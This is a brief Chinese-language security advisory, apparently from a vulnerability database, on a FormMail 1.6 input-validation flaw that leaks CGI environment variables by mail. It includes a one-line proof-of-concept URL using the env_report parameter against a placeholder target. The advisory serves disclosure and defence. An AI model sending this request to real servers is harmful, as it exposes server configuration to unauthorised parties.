Matt Wright FormMail泄露环境变量发布时间:2000-09-10 更新时间:2000-08-10 严重程度:中 威胁程度:服务器信息泄露 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Matt Wright FormMail 1.6详细描述 一远程用户使用Matt Wright FormMail ,并在URL上发送一特定的请求,远程用户就可以通过MAIL来获得CGI的环境参数变量。 测试代码 http:/target/cgibin/formmail.cgi? env_report=PATH&recipient=&required=&firstname=&lastname=&email=&me ssage=&Submit= 解决方案 尚无 相关信息 |